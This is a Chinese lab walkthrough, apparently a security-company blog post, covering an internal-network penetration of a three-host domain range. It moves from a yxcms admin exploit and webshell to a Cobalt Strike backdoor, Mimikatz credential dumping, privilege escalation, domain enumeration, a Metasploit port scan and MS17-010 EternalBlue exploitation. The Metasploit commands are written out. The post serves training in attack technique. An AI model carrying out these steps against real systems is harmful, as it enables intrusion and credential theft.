记一次内网渗透过程学习|天磊卫士

一、靶场说明

此靶场共有3台主机
Win7为双网卡，桥接为模拟外网ip（192.168.1.220），nat（192.168.52.142）模拟内网域环境，处于DMZ区域的web服务器
Win2013为内网域控成员（nat：192.168.52.141）
Win2018为域控主机（nat：192.168.52.138）
Win2018为域控主机（nat：192.168.52.138）

二、web服务器渗透

信息收集
Nmap端口扫描192.168.1.220

访问80端口，发现在页面有网站后台地址和登录密码
百度一下看看关于yxcms有哪些历史漏洞，发现一个后台模板代码任意修改漏洞获取shell
访问http://192.168.1.220/index.php?r=admin/set/tpadd&Mname=default


成功getshell，使用冰蝎进行连接

三、内网信息收集

使用systeminfo命令获取系统信息

先做个简单的内网信息收集
查看当前用户权限：whoami ，是管理员权限

查看是否存在域：ipconfig /all ，主DNS后缀不为空，存在域：god.org

net config workstation 可以直接查看域情况，本机名是stu1

现已成功拿下了目标主机权限，拿下主机权限之后要植入后门，植入后门的方法大致有两种，分别是CS和MSF
利用Cobalts Strike生成exp可执行后门

使用冰蝎将exe后门上传到目标主机上

在冰蝎上使用命令执行exe后门

（因不是同一次时间做的，IP会有所改变）执行后门之后，目标主机在cs中上线

使用beacon模块探测域控信息，net view查询同一域控内的其他IP，域控为OWA

使用CS中的Mimikatz抓取本机密码，本机登录密码为hongrisec@2019，用户名为Administrator


利用CS将Administrator管理员权限提权到system系统权限账户


确认域控可以利用net time /domain命令，一般情况下时间服务器就是属于域控服务器了，也可以利用 net group “domain controllers” /domain 命令直接找出域控制器，确定该域控服务器为OWA

shell net group “domain admins” /domain查询域管理用户
shell net user /domain 查询域用户列表
shell net group “domain computers” /domain 查询域内所有计算机主机名

四、内网横向渗透

反弹shell
在kail上对端口进行监听，对msf配置

在CS中新建listeners，这里需要注意的事，CS生成的payload要和kail中监听的payload保持一致



这样就可以成功反弹shell了

可以通过msf对内网存活主机进行扫描，发现存活机器两台，地址分别为192.168.52.141和192.168.52.138

对存活的主机进行端口扫描，发现两个IP都开启了445端口
use auxiliary/scanner/portscan/tcp //使用模块
set rhosts xxx.xxx.xxx //指定目标主机
set ports 80,135-139,3306,3389 //指定端口范围
run

利用msf工具自带的ms17-010对两个IP进行内网扫描，看看是否存在该漏洞

这两个主机都存在ms17-010，接下来就是利用该漏洞对内网进行攻击了
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
Run

也可以利用msf中的mimikatz抓取用户名和密码，首先在msf上使用命令load mimikatz
加载该工具，再根据以下命令对用户名和密码进行抓取
msv 获取的是hash值
ssp 获取的是明文信息
wdigest 读取内存中存放的账号密码明文信息
kerberos 读取内存中存放的账号密码明文信息

接下来可以尝试开启3389端口，进行远程连接。